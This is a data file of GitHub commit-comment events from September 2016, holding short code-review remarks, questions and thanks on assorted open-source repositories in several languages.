{"id":"4580521700","type":"CommitCommentEvent","actor":{"login":"davidromani"},"repo":{"name":"Flexible-User-Experience/Espai-Kowo"},"payload":{"comment":{"id":19072058,"position":null,"line":null,"path":null,"commit_id":"2df2f9c1b4cfe9933087458763b92e1da272e8cb","created_at":"2016-09-18T19:58:44Z","updated_at":"2016-09-18T19:58:44Z","body":"Well done! Did you try it? It works?"}},"created_at":"2016-09-18T19:58:44Z"}
{"id":"4580522985","type":"CommitCommentEvent","actor":{"login":"SGolenzovskiy"},"repo":{"name":"SGolenzovskiy/altrc"},"payload":{"comment":{"id":19072059,"position":null,"line":null,"path":null,"commit_id":"7998ae6ef08ce6cebc2a2953ae068100583cb018","created_at":"2016-09-18T19:59:33Z","updated_at":"2016-09-18T19:59:33Z","body":"Правки по результатам ревью d83f947a3b2c30cd97fd307693eac69dc16f67d3"}},"created_at":"2016-09-18T19:59:33Z"}
{"id":"4579031536","type":"CommitCommentEvent","actor":{"login":"a233894432"},"repo":{"name":"a233894432/Framework7-Plus"},"payload":{"comment":{"id":19068455,"position":null,"line":null,"path":null,"commit_id":"93df7121db5a5d827d9f1866cdf34da8e1da2a05","created_at":"2016-09-18T02:01:06Z","updated_at":"2016-09-18T02:01:06Z","body":"commit"}},"created_at":"2016-09-18T02:01:06Z"}
{"id":"4579032062","type":"CommitCommentEvent","actor":{"login":"fredemmott"},"repo":{"name":"phplang/phack"},"payload":{"comment":{"id":19068461,"position":13,"line":27,"path":"README.md","commit_id":"f33df6df09c9b902d32d7ce86de7fae2da12feef","created_at":"2016-09-18T02:01:31Z","updated_at":"2016-09-18T02:01:31Z","body":"Any plans for the special ones with runtime effects? __Memoize, __MockClass in particular"}},"created_at":"2016-09-18T02:01:31Z"}
{"id":"4579034185","type":"CommitCommentEvent","actor":{"login":"fredemmott"},"repo":{"name":"phplang/phack"},"payload":{"comment":{"id":19068462,"position":13,"line":27,"path":"README.md","commit_id":"f33df6df09c9b902d32d7ce86de7fae2da12feef","created_at":"2016-09-18T02:02:30Z","updated_at":"2016-09-18T02:02:30Z","body":"re reflection: maybe replace ReflectionFoo with PhackReflectionFoo in Hack files, allow PHP files to call it directly, copy the HHVM API in PhackReflectionFoo"}},"created_at":"2016-09-18T02:02:30Z"}
{"id":"4579036591","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"tfaller/phpmyadmin"},"payload":{"comment":{"id":19068464,"position":null,"line":null,"path":null,"commit_id":"1db0f95b1b6ccf090583b50d686fbff086af56ef","created_at":"2016-09-18T02:04:16Z","updated_at":"2016-09-18T02:04:16Z","body":"<!-- PMABOT:SPACE -->\nThis commit contains trailing whitespace, what is prohibited in phpMyAdmin. Please check our [Developer guidelines](https://github.com/phpmyadmin/phpmyadmin/wiki/Developer_guidelines#Indentation) for more information.\n\nOffending files: libraries/rte/rte_routines.lib.php"}},"created_at":"2016-09-18T02:04:16Z"}
{"id":"4579038663","type":"CommitCommentEvent","actor":{"login":"patrickelectric"},"repo":{"name":"tcanabrava/atcore"},"payload":{"comment":{"id":19068469,"position":18,"line":18,"path":"src/atcore.cpp","commit_id":"4cb773e59a73c6ac05a70941ea45e3bcd1a63408","created_at":"2016-09-18T02:05:51Z","updated_at":"2016-09-18T02:05:51Z","body":"Put the pointers first they have the same length and will not use so much memory in the memory.\r\nPut bool in the last to not use a entire word for a one byte."}},"created_at":"2016-09-18T02:05:51Z"}
{"id":"4579040368","type":"CommitCommentEvent","actor":{"login":"patrickelectric"},"repo":{"name":"tcanabrava/atcore"},"payload":{"comment":{"id":19068471,"position":70,"line":70,"path":"src/atcore.cpp","commit_id":"4cb773e59a73c6ac05a70941ea45e3bcd1a63408","created_at":"2016-09-18T02:07:08Z","updated_at":"2016-09-18T02:07:08Z","body":"Why not use the mcommand namespace ?"}},"created_at":"2016-09-18T02:07:08Z"}
{"id":"4579041234","type":"CommitCommentEvent","actor":{"login":"dmgolubovsky"},"repo":{"name":"Harvey-OS/harvey"},"payload":{"comment":{"id":19068472,"position":null,"line":null,"path":null,"commit_id":"a07a6bb467ae86fc0387258c27d855ac76246551","created_at":"2016-09-18T02:07:49Z","updated_at":"2016-09-18T02:07:49Z","body":"Was line 335 left there by mistake?"}},"created_at":"2016-09-18T02:07:49Z"}
{"id":"4579041823","type":"CommitCommentEvent","actor":{"login":"zhyinch"},"repo":{"name":"IndoorPosSquad/dw1000_firmware"},"payload":{"comment":{"id":19068473,"position":null,"line":null,"path":null,"commit_id":"6f95c18a4c5612d40e12ed5bcb1dcc09b1355b5d","created_at":"2016-09-18T02:08:17Z","updated_at":"2016-09-18T02:08:17Z","body":"@ajaybhatt003 \r\nHi, If you want to connect with DW1000. You need connect the SPI lines of DW1000 and andunio/pixhawk together. DW1000 is SPI interface. Then you need go to the official website to download some rangging demo code to get the distance. "}},"created_at":"2016-09-18T02:08:17Z"}
{"id":"4579042878","type":"CommitCommentEvent","actor":{"login":"wellwind"},"repo":{"name":"wellwind/8ComicDownloaderElectron"},"payload":{"comment":{"id":19068474,"position":null,"line":null,"path":null,"commit_id":"203719c54eedfd7298e758b12e946bd52014afe0","created_at":"2016-09-18T02:09:04Z","updated_at":"2016-09-18T02:09:04Z","body":"處理 issue #2 "}},"created_at":"2016-09-18T02:09:04Z"}
{"id":"4579043473","type":"CommitCommentEvent","actor":{"login":"patrickelectric"},"repo":{"name":"tcanabrava/atcore"},"payload":{"comment":{"id":19068477,"position":15,"line":55,"path":"src/atcore.cpp","commit_id":"d3e05138d52509bd9e6d3a1b3a962589ccc7541b","created_at":"2016-09-18T02:09:33Z","updated_at":"2016-09-18T02:09:33Z","body":"Take off elif, use only else. It's better to have a default OS if all fails. "}},"created_at":"2016-09-18T02:09:33Z"}
{"id":"4579045458","type":"CommitCommentEvent","actor":{"login":"jmbs22"},"repo":{"name":"jmbs22/death-road-to-canada-locales"},"payload":{"comment":{"id":19068484,"position":4,"line":4,"path":"README.md","commit_id":"75dfeab07a7f408426243e198d6b4be4b1f153c1","created_at":"2016-09-18T02:11:05Z","updated_at":"2016-09-18T02:11:05Z","body":"esta es la localizacion en español ya depurada, solo quedan los textos del juego, las reglas para participar en la traduccion es:\r\n-no traducir las palabras en mayusculas a menos que sean vistas en el juego\r\n-solo traducir la parte \"valor\" de los archivos\r\n-no eliminar ni las comillas dobles ni las aperturas de los signos de interrogacion\r\n-no incluir tildes ni la letra ñ ni las aperturas de signos ni tampoco comillas dobles, solo simples. (á,é,í,ó,ú,ñ,¿,!,\",...)\r\n\r\nla estructura del archivo es la siguiente\r\n[nombre del archivo.df]\r\n¿key¿=\"¿valor¿\""}},"created_at":"2016-09-18T02:11:05Z"}
{"id":"4579047079","type":"CommitCommentEvent","actor":{"login":"DoKel"},"repo":{"name":"clintbellanger/flare-game"},"payload":{"comment":{"id":19068485,"position":null,"line":null,"path":null,"commit_id":"5c1b7496b7837b7960716dd3153da90fa9ccde6c","created_at":"2016-09-18T02:12:11Z","updated_at":"2016-09-18T02:12:11Z","body":"Lol, u could just say me to fix that. I will be more careful about that next time."}},"created_at":"2016-09-18T02:12:11Z"}
{"id":"4579051083","type":"CommitCommentEvent","actor":{"login":"dorkster"},"repo":{"name":"clintbellanger/flare-game"},"payload":{"comment":{"id":19068493,"position":null,"line":null,"path":null,"commit_id":"5c1b7496b7837b7960716dd3153da90fa9ccde6c","created_at":"2016-09-18T02:15:07Z","updated_at":"2016-09-18T02:15:07Z","body":"No worries. I'm not sure what text editor you use, but you should try and see if there's a setting to remove trailing white-space when saving."}},"created_at":"2016-09-18T02:15:07Z"}
{"id":"4579052893","type":"CommitCommentEvent","actor":{"login":"tcanabrava"},"repo":{"name":"tcanabrava/atcore"},"payload":{"comment":{"id":19068496,"position":15,"line":55,"path":"src/atcore.cpp","commit_id":"d3e05138d52509bd9e6d3a1b3a962589ccc7541b","created_at":"2016-09-18T02:16:37Z","updated_at":"2016-09-18T02:16:37Z","body":"if all fails, then no plugin is loaded.\r\n"}},"created_at":"2016-09-18T02:16:37Z"}
{"id":"4579053270","type":"CommitCommentEvent","actor":{"login":"zjw123456qq"},"repo":{"name":"zjw123456qq/lagou.com"},"payload":{"comment":{"id":19068499,"position":null,"line":null,"path":null,"commit_id":"d44e5f4858fb16f3bb6d91d5053a3f8b614dc3c9","created_at":"2016-09-18T02:16:58Z","updated_at":"2016-09-18T02:16:58Z","body":"我是张家卫"}},"created_at":"2016-09-18T02:16:58Z"}
{"id":"4579053422","type":"CommitCommentEvent","actor":{"login":"tcanabrava"},"repo":{"name":"tcanabrava/atcore"},"payload":{"comment":{"id":19068500,"position":18,"line":18,"path":"src/atcore.cpp","commit_id":"4cb773e59a73c6ac05a70941ea45e3bcd1a63408","created_at":"2016-09-18T02:17:07Z","updated_at":"2016-09-18T02:17:07Z","body":"ok\r\n"}},"created_at":"2016-09-18T02:17:07Z"}
{"id":"4579053640","type":"CommitCommentEvent","actor":{"login":"notesecret"},"repo":{"name":"DunstleOS/openkore"},"payload":{"comment":{"id":19068501,"position":null,"line":null,"path":null,"commit_id":"897196fdf51f54809d0caf4a937e1f6ab73a2108","created_at":"2016-09-18T02:17:14Z","updated_at":"2016-09-18T02:17:14Z","body":"บรรทัด Digest ที่ลบออก x0 มันปิดตัวลงเองตอนเข้าแมพครับ เอากลับมาใส่ก็เปิดได้ปกติ\r\n\r\nใน DirectConnection ผมก็เอาไปใส่แล้วนะ"}},"created_at":"2016-09-18T02:17:14Z"}
{"id":"4579053812","type":"CommitCommentEvent","actor":{"login":"tcanabrava"},"repo":{"name":"tcanabrava/atcore"},"payload":{"comment":{"id":19068503,"position":70,"line":70,"path":"src/atcore.cpp","commit_id":"4cb773e59a73c6ac05a70941ea45e3bcd1a63408","created_at":"2016-09-18T02:17:24Z","updated_at":"2016-09-18T02:17:24Z","body":"because I didn't realized it's existence."}},"created_at":"2016-09-18T02:17:24Z"}
{"id":"4579060959","type":"CommitCommentEvent","actor":{"login":"idyjc2000"},"repo":{"name":"cs61/cs61-psets"},"payload":{"comment":{"id":19068532,"position":11,"line":11,"path":"pset1/README.txt","commit_id":"7ffd60d8f268c66c5a8f9814161935cf2195d355","created_at":"2016-09-18T02:23:15Z","updated_at":"2016-09-18T02:23:15Z","body":"DO NOT GRADE"}},"created_at":"2016-09-18T02:23:15Z"}
{"id":"4579063598","type":"CommitCommentEvent","actor":{"login":"clairscent"},"repo":{"name":"waigani/codelingo_demo"},"payload":{"comment":{"id":19068541,"position":null,"line":null,"path":null,"commit_id":"338a06c4c248ab17bd82a1a76b8c76a4ef95c224","created_at":"2016-09-18T02:25:29Z","updated_at":"2016-09-18T02:25:29Z","body":"overall comment"}},"created_at":"2016-09-18T02:25:29Z"}
{"id":"4579066897","type":"CommitCommentEvent","actor":{"login":"brousseau6933"},"repo":{"name":"syscl/Fix-usb-sleep"},"payload":{"comment":{"id":19068546,"position":null,"line":null,"path":null,"commit_id":"6149bccf4e3321a527679652d98b0b2d551041f3","created_at":"2016-09-18T02:28:08Z","updated_at":"2016-09-18T02:28:08Z","body":"Thanks,\r\nI'll try it tomorrow."}},"created_at":"2016-09-18T02:28:08Z"}
{"id":"4579069228","type":"CommitCommentEvent","actor":{"login":"jdolan"},"repo":{"name":"jdolan/quetoo"},"payload":{"comment":{"id":19068552,"position":null,"line":null,"path":null,"commit_id":"cc3743210be6fdb755f4b0236e5d92a2f3f72550","created_at":"2016-09-18T02:30:03Z","updated_at":"2016-09-18T02:30:03Z","body":"What's wrong with this picture?"}},"created_at":"2016-09-18T02:30:03Z"}
{"id":"4579071675","type":"CommitCommentEvent","actor":{"login":"1057651803"},"repo":{"name":"ushahidi/SMSSync"},"payload":{"comment":{"id":19068557,"position":12,"line":12,"path":"smssync/proguard-gson.pro","commit_id":"8270559d5cd3737926cc67c40324e803250ee7a1","created_at":"2016-09-18T02:31:55Z","updated_at":"2016-09-18T02:31:55Z","body":"+#}\r\n +\r\n +## --------------- Start Project specifics --------------- ##\r\n +\r\n +# Keep the BuildConfig\r\n +-keep class org.addhen.smssync.BuildConfig { *; }\r\n +\r\n +# Keep the support library\r\n +-keep class android.support.v4.** { *; }\r\n +-keep interface android.support.v4.** { *; }\r\n +\r\n +# Application classes that will be serialized/deserialized over Gson\r\n +# or have been blown up by ProGuard in the past\r\n +-keep class org.addhen.smssync.models.** {*;}\r\n +\r\n +## ---------------- End Project specifics ---------------- ## \r\nView 19  smssync/proguard-rules.tx"}},"created_at":"2016-09-18T02:31:55Z"}
{"id":"4579074167","type":"CommitCommentEvent","actor":{"login":"javelinanddart"},"repo":{"name":"bryan2894/android_device_samsung_msm8660-common"},"payload":{"comment":{"id":19068562,"position":null,"line":null,"path":null,"commit_id":"28dfe186a19dec6563d0fe02048aa8c0fcaf7aa7","created_at":"2016-09-18T02:34:00Z","updated_at":"2016-09-18T02:34:00Z","body":"I nominate this commit message for understatement of the year"}},"created_at":"2016-09-18T02:34:00Z"}
{"id":"4579076065","type":"CommitCommentEvent","actor":{"login":"lucasbrendel"},"repo":{"name":"lucasbrendel/CppRoundRobin"},"payload":{"comment":{"id":19068565,"position":null,"line":null,"path":null,"commit_id":"79cca0a79974ab0a62f0cb106056f8adc23c1321","created_at":"2016-09-18T02:35:38Z","updated_at":"2016-09-18T02:35:38Z","body":"fixes #5 "}},"created_at":"2016-09-18T02:35:38Z"}
{"id":"4579077034","type":"CommitCommentEvent","actor":{"login":"yvasilyev92"},"repo":{"name":"udacity/Sunshine-Version-2"},"payload":{"comment":{"id":19068567,"position":null,"line":null,"path":null,"commit_id":"0d060ffebcb6b6eec2501a352d3b76dee9d10d05","created_at":"2016-09-18T02:36:27Z","updated_at":"2016-09-18T02:36:27Z","body":"@NickNightingale77 thank you. you are a life saver."}},"created_at":"2016-09-18T02:36:27Z"}
{"id":"4579080531","type":"CommitCommentEvent","actor":{"login":"jhabdas"},"repo":{"name":"boletindigital/blog"},"payload":{"comment":{"id":19068579,"position":null,"line":null,"path":null,"commit_id":"009c6f6812166ab9271c10e4cae838ad06dec2fe","created_at":"2016-09-18T02:39:27Z","updated_at":"2016-09-18T02:39:27Z","body":"De nada :) enjoy"}},"created_at":"2016-09-18T02:39:27Z"}
{"id":"4579089112","type":"CommitCommentEvent","actor":{"login":"greenlaw110"},"repo":{"name":"alibaba/fastjson"},"payload":{"comment":{"id":19068598,"position":null,"line":null,"path":null,"commit_id":"8b019a267493c365226ee6af8889db1ef8d0d420","created_at":"2016-09-18T02:46:26Z","updated_at":"2016-09-18T02:46:26Z","body":"@wenshao why do you implement it as raising an exception? Shouldn't it be something like:\r\n\r\n```java\r\npublic class Issue776 extends TestCase {\r\n     public void test_for_issue() throws Exception {\r\n         String str1 = \"{\\\"v\\\":[\\\" \\\",\\\"abc\\\",\\\"x\\\",\\\"abc\\\"]}\";\r\n \r\n         char[] c =  JSON.parseObject(str1, new  com.alibaba.fastjson.TypeReference<Map<String, char[]>>() {});\r\n         assertEquals(4, c.length);\r\n         assertEquals(c[0], ' ');\r\n         assertEquals(c[1], 'a'):\r\n         assertEquals(c[2], 'x'):\r\n         assertEquals(c[3], 'a'):\r\n     }\r\n```"}},"created_at":"2016-09-18T02:46:26Z"}
{"id":"4579090393","type":"CommitCommentEvent","actor":{"login":"JBCDroid2"},"repo":{"name":"CypherOS/platform_manifest"},"payload":{"comment":{"id":19068603,"position":null,"line":null,"path":null,"commit_id":"98516b7bd1a4b6095b1f9c0c2a28cde00f45ee9e","created_at":"2016-09-18T02:47:26Z","updated_at":"2016-09-18T02:47:26Z","body":"fatal: duplicate path external/e2fsprogs in /home/jbcdroid/Roms/AOSCP/.repo/manifests/default.xml\r\n\r\nline 196  <project path=\"external/e2fsprogs\" name=\"platform/external/e2fsprogs\" groups=\"pdk\" />"}},"created_at":"2016-09-18T02:47:26Z"}
{"id":"4579090634","type":"CommitCommentEvent","actor":{"login":"jtreuting"},"repo":{"name":"SmarterApp/TDS_Common"},"payload":{"comment":{"id":19068604,"position":16,"line":16,"path":"src/main/java/tds/common/data/mysql/InstantPropertyEditorSupport.java","commit_id":"eab8265cecca8b2bb5f87a67e777377b7feca9dc","created_at":"2016-09-18T02:47:39Z","updated_at":"2016-09-18T02:47:39Z","body":"I think I figured out where my disconnect was once I was able to look up some details on the methods being used.  So the toLocalDateTime() method returns a LocalDateTime object which in my mind meant that it included the timezone of the local server.  But according to the docs it is a date-time without a timezone: https://docs.oracle.com/javase/8/docs/api/java/time/LocalDateTime.html\r\n\r\nI see there is also a toInstant() on the sql.Timestamp, but it doesn't take a timezone so it stays just a date and time.  I'm guessing the thinking is we will want it to have the timezone so that we can do comparisons against the current time that we get from java as UTC.  So I think the code you have is now making sense to me.  Sorry.\r\n\r\nIf the dates in the DB aren't UTC we have a bigger problem cause we won't be able to tell since MySQL just stores date and time and no timezone.  So in order to make sure that isn't an issue and the DB server doesn't have to be set to UTC, we should probably use UTC_TIMESTAMP() in any SQL instead of NOW() which is dependent on the server timezone.\r\n\r\nUnfortunately for legacy code, we will need to either change all NOW() calls to UTC_TIMESTAMP() (a lot of code changes) or make the DB server being on UTC time required (or at least mysql conf file setting the timezone to UTC even if the physical server isn't).\r\n\r\nSo to sum up, my confusion was that I assumed toLocalDateTime() changed the date from whatever the server had (which it would have no way of knowing a timezone) to the local timezone and then to UTC.\r\n\r\nSorry for the detour on the comments as I worked through that."}},"created_at":"2016-09-18T02:47:39Z"}
{"id":"4579092246","type":"CommitCommentEvent","actor":{"login":"Kostronor"},"repo":{"name":"Minecolonies/minecolonies"},"payload":{"comment":{"id":19068608,"position":4,"line":374,"path":"src/main/java/com/minecolonies/colony/ColonyManager.java","commit_id":"1bcced86ff97eae8598c29097d469e320d879454","created_at":"2016-09-18T02:48:48Z","updated_at":"2016-09-18T02:48:48Z","body":"Can we slap a Nullable on argument and return type? "}},"created_at":"2016-09-18T02:48:48Z"}
{"id":"4579092720","type":"CommitCommentEvent","actor":{"login":"leeleslie7"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19068609,"position":117,"line":117,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-18T02:49:14Z","updated_at":"2016-09-18T02:49:14Z","body":"$.map本身就能返回一个新的数组吧"}},"created_at":"2016-09-18T02:49:14Z"}
{"id":"4579095728","type":"CommitCommentEvent","actor":{"login":"leeleslie7"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19068614,"position":138,"line":138,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-18T02:51:33Z","updated_at":"2016-09-18T02:51:33Z","body":"函数的形参没有意义"}},"created_at":"2016-09-18T02:51:33Z"}
{"id":"4579097015","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"mjjohns1/dsp"},"payload":{"comment":{"id":19068616,"position":null,"line":null,"path":null,"commit_id":"27e28fa1144170fd921d3115ff5bd19f7adc11fa","created_at":"2016-09-18T02:52:36Z","updated_at":"2016-09-18T02:52:36Z","body":"RE: 05a-python.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @mjjohns1 \r\n\r\nNice job with the Python problems! Here are some minor comments:\r\n- Q1: Lists often contain different types of items. For example, a list of customers could contain, for each customer, a list consisting of name, email, age, gender, etc.\r\n- Q5: Note that you can, for example, `print diff3.days` to just extract the days.\r\n- Q6 & Q7: All these functions should *return* their result rather than print it (as per the instructions). If you then call one of these functions from within ipython, the returned item will automatically be displayed.\r\n\r\n👍 "}},"created_at":"2016-09-18T02:52:36Z"}
{"id":"4579098062","type":"CommitCommentEvent","actor":{"login":"rotta-mat"},"repo":{"name":"mirandadam/laboratorio_sequencia"},"payload":{"comment":{"id":19068619,"position":null,"line":null,"path":null,"commit_id":"54617f4b6e6d831d483f66917ac95cb89371dbf0","created_at":"2016-09-18T02:53:28Z","updated_at":"2016-09-18T02:53:28Z","body":"Oi, já criei a minha conta.\r\n"}},"created_at":"2016-09-18T02:53:28Z"}
{"id":"4579100640","type":"CommitCommentEvent","actor":{"login":"a233894432"},"repo":{"name":"a233894432/HTML5_research"},"payload":{"comment":{"id":19068627,"position":null,"line":null,"path":null,"commit_id":"2073fa3bb9ab56585dbc411c096ec208eb68367e","created_at":"2016-09-18T02:55:42Z","updated_at":"2016-09-18T02:55:42Z","body":"merge"}},"created_at":"2016-09-18T02:55:42Z"}
{"id":"4579100658","type":"CommitCommentEvent","actor":{"login":"blacky0x0"},"repo":{"name":"dzieciou/curl-logger"},"payload":{"comment":{"id":19068628,"position":8,"line":190,"path":"src/main/java/com/github/dzieciou/testing/curl/Http2Curl.java","commit_id":"f66b0931046bcf475d99ee931f4660eba79f3ab4","created_at":"2016-09-18T02:55:42Z","updated_at":"2016-09-18T02:55:42Z","body":"[1]  -> java.lang.ArrayIndexOutOfBoundsException"}},"created_at":"2016-09-18T02:55:42Z"}
{"id":"4579100828","type":"CommitCommentEvent","actor":{"login":"jhcole"},"repo":{"name":"minetest/minetest_game"},"payload":{"comment":{"id":19068629,"position":null,"line":null,"path":null,"commit_id":"60cf3f85b6e661482ec2705cadbdc1b04e388d19","created_at":"2016-09-18T02:55:50Z","updated_at":"2016-09-18T02:55:50Z","body":"Allowing the screwdriver to rotate the door like this, fails to rotate the 'Hidden Door Segment' that is in the hinge of the top half of the door. For players, this segment causes unexpected collision with a hidden object."}},"created_at":"2016-09-18T02:55:50Z"}
{"id":"4579103349","type":"CommitCommentEvent","actor":{"login":"tschf"},"repo":{"name":"OraOpenSource/OXAR"},"payload":{"comment":{"id":19068635,"position":53,"line":100,"path":"addons/aop/install_aop_local.sh","commit_id":"0604f014f241d4b5aa89712bd2c5c540f01ebe28","created_at":"2016-09-18T02:57:58Z","updated_at":"2016-09-18T02:57:58Z","body":"This could be added as a separate script into `/etc/profile.d/`. We currently do this e.g. [for node](https://github.com/OraOpenSource/OXAR/blob/afc93842cb08a8e926515ea40eaf24774693a245/scripts/node-oracledb.sh#L16)"}},"created_at":"2016-09-18T02:57:58Z"}
{"id":"4579103405","type":"CommitCommentEvent","actor":{"login":"Sirhc95"},"repo":{"name":"CypherOS/platform_manifest"},"payload":{"comment":{"id":19068636,"position":null,"line":null,"path":null,"commit_id":"98516b7bd1a4b6095b1f9c0c2a28cde00f45ee9e","created_at":"2016-09-18T02:58:01Z","updated_at":"2016-09-18T02:58:01Z","body":"Fixed, thanks"}},"created_at":"2016-09-18T02:58:01Z"}
{"id":"4580524287","type":"CommitCommentEvent","actor":{"login":"Sandertv"},"repo":{"name":"BoxOfDevs/BoxOfBits"},"payload":{"comment":{"id":19072062,"position":null,"line":null,"path":null,"commit_id":"1014a4af2550215892a9045cb3c9ede077f780f6","created_at":"2016-09-18T20:00:14Z","updated_at":"2016-09-18T20:00:14Z","body":"Sure! Will do that tomorrow :)"}},"created_at":"2016-09-18T20:00:14Z"}
{"id":"4580524293","type":"CommitCommentEvent","actor":{"login":"rafaelcn"},"repo":{"name":"brain-labs/brainduino"},"payload":{"comment":{"id":19072063,"position":33,"line":68,"path":"Brainduino/Brain.cpp","commit_id":"45c1c098316ded46767af821ed3c688851a0d04b","created_at":"2016-09-18T20:00:15Z","updated_at":"2016-09-18T20:00:15Z","body":"For sure, I agree with you. "}},"created_at":"2016-09-18T20:00:15Z"}
{"id":"4580525412","type":"CommitCommentEvent","actor":{"login":"kelson42"},"repo":{"name":"kiwix/kiwix"},"payload":{"comment":{"id":19072066,"position":null,"line":null,"path":null,"commit_id":"699416a09dfb5d4c59883459f1f64f1ca3bdde55","created_at":"2016-09-18T20:00:47Z","updated_at":"2016-09-18T20:00:47Z","body":"No chance to avoid this? I mean this looks odd to need this kind of permission for a custom app."}},"created_at":"2016-09-18T20:00:47Z"}
{"id":"4580525985","type":"CommitCommentEvent","actor":{"login":"kelson42"},"repo":{"name":"kiwix/kiwix"},"payload":{"comment":{"id":19072067,"position":null,"line":null,"path":null,"commit_id":"f95d77c8d72780d6165cd074e7d24b93226dcefc","created_at":"2016-09-18T20:01:04Z","updated_at":"2016-09-18T20:01:04Z","body":"nice!"}},"created_at":"2016-09-18T20:01:04Z"}
{"id":"4580530300","type":"CommitCommentEvent","actor":{"login":"ZoroarkShade"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19072070,"position":null,"line":null,"path":null,"commit_id":"270db5d1c0e116b95de38e2a2c53564399417b40","created_at":"2016-09-18T20:02:58Z","updated_at":"2016-09-18T20:02:58Z","body":"[Only spanish]\r\n\r\nSiguen apareciendo los masivos bots al servidor.\r\nhttp://prntscr.com/cjjo37"}},"created_at":"2016-09-18T20:02:58Z"}
{"id":"4580530610","type":"CommitCommentEvent","actor":{"login":"tarsius"},"repo":{"name":"foretagsplatsen/emacs-js"},"payload":{"comment":{"id":19072072,"position":null,"line":null,"path":null,"commit_id":"69b041f240dc1b6239f51159ee4bd97e596ee7d5","created_at":"2016-09-18T20:03:10Z","updated_at":"2016-09-18T20:03:10Z","body":"Thanks to you too!"}},"created_at":"2016-09-18T20:03:10Z"}
{"id":"4580531111","type":"CommitCommentEvent","actor":{"login":"usagirei"},"repo":{"name":"UmaiUmeUnion/UmaiUme.Launcher"},"payload":{"comment":{"id":19072073,"position":null,"line":null,"path":null,"commit_id":"c411fd0773530f663711d31351776e711c2809fe","created_at":"2016-09-18T20:03:26Z","updated_at":"2016-09-18T20:03:26Z","body":"Hey Denikson,  unrelated to the commit, but hit me up later, wanna talk about some stuff related to this (good news maybe)"}},"created_at":"2016-09-18T20:03:26Z"}
{"id":"4580532959","type":"CommitCommentEvent","actor":{"login":"yuvalshaia"},"repo":{"name":"qemu/qemu"},"payload":{"comment":{"id":19072078,"position":4,"line":272,"path":"hw/net/pvrdma/pvrdma_main.c","commit_id":"b74cb04cbd750fe5daead263c2c25347b1d335cd","created_at":"2016-09-18T20:04:36Z","updated_at":"2016-09-18T20:04:36Z","body":"There is lot of extra work on naming :)"}},"created_at":"2016-09-18T20:04:36Z"}
{"id":"4580535803","type":"CommitCommentEvent","actor":{"login":"cb1kenobi"},"repo":{"name":"hansemannn/titanium_mobile"},"payload":{"comment":{"id":19072085,"position":56,"line":1911,"path":"iphone/cli/commands/_build.js","commit_id":"ed273953fec2fdfa36bfbe9431d0c9600d50a3a6","created_at":"2016-09-18T20:06:22Z","updated_at":"2016-09-18T20:06:22Z","body":"You fixed it. :)"}},"created_at":"2016-09-18T20:06:22Z"}
{"id":"4580535987","type":"CommitCommentEvent","actor":{"login":"efroim102"},"repo":{"name":"callemall/material-ui"},"payload":{"comment":{"id":19072086,"position":null,"line":null,"path":null,"commit_id":"4cbd4061b585fdedac03e06fc2a56f4b315d2cd4","created_at":"2016-09-18T20:06:29Z","updated_at":"2016-09-18T20:06:29Z","body":"@agoldis When are these new properties going live?\r\n\r\nI need to custom style a toggle when in the on state and I don't want to have to do it in the theme provider since I only want to use the theme provider once and use different styling for different toggles.\r\n\r\nI installed the pre-release, but these properties are not included there either.\r\n\r\nI'm wondering If I can temporarily copy the Toggle.js file as a custom component in my app until these properties get fully released. "}},"created_at":"2016-09-18T20:06:29Z"}
{"id":"4580536876","type":"CommitCommentEvent","actor":{"login":"maicol289"},"repo":{"name":"carlosbalamba/MIKEBOL"},"payload":{"comment":{"id":19072087,"position":null,"line":null,"path":null,"commit_id":"b609a9ac9fe48605bd793ce75b5467562901beea","created_at":"2016-09-18T20:07:03Z","updated_at":"2016-09-18T20:07:03Z","body":"viabilidad de costos \r\n[VIABILIDAD DE COSTOS (1).docx](https://github.com/carlosbalamba/MIKEBOL/files/478961/VIABILIDAD.DE.COSTOS.1.docx)\r\n"}},"created_at":"2016-09-18T20:07:03Z"}
{"id":"4580536892","type":"CommitCommentEvent","actor":{"login":"fruitwasp"},"repo":{"name":"FPtje/DarkRP"},"payload":{"comment":{"id":19072088,"position":14,"line":201,"path":"gamemode/modules/chat/sv_chatcommands.lua","commit_id":"bba9494a471d8f2044398102b0b160dfb73c6337","created_at":"2016-09-18T20:07:04Z","updated_at":"2016-09-18T20:07:04Z","body":"debug print still there"}},"created_at":"2016-09-18T20:07:04Z"}
{"id":"4580539514","type":"CommitCommentEvent","actor":{"login":"FPtje"},"repo":{"name":"FPtje/DarkRP"},"payload":{"comment":{"id":19072090,"position":14,"line":201,"path":"gamemode/modules/chat/sv_chatcommands.lua","commit_id":"bba9494a471d8f2044398102b0b160dfb73c6337","created_at":"2016-09-18T20:08:38Z","updated_at":"2016-09-18T20:08:38Z","body":"anus"}},"created_at":"2016-09-18T20:08:38Z"}
{"id":"4580539572","type":"CommitCommentEvent","actor":{"login":"radare"},"repo":{"name":"radare/radare2"},"payload":{"comment":{"id":19072092,"position":36,"line":2147,"path":"libr/anal/esil.c","commit_id":"09f384a2521d8fb83934c81d954fb1e50d8597fc","created_at":"2016-09-18T20:08:40Z","updated_at":"2016-09-18T20:08:40Z","body":"free already checks for null, drop that if"}},"created_at":"2016-09-18T20:08:40Z"}
{"id":"4580539739","type":"CommitCommentEvent","actor":{"login":"radare"},"repo":{"name":"radare/radare2"},"payload":{"comment":{"id":19072094,"position":34,"line":2145,"path":"libr/anal/esil.c","commit_id":"09f384a2521d8fb83934c81d954fb1e50d8597fc","created_at":"2016-09-18T20:08:47Z","updated_at":"2016-09-18T20:08:47Z","body":"empty line"}},"created_at":"2016-09-18T20:08:47Z"}
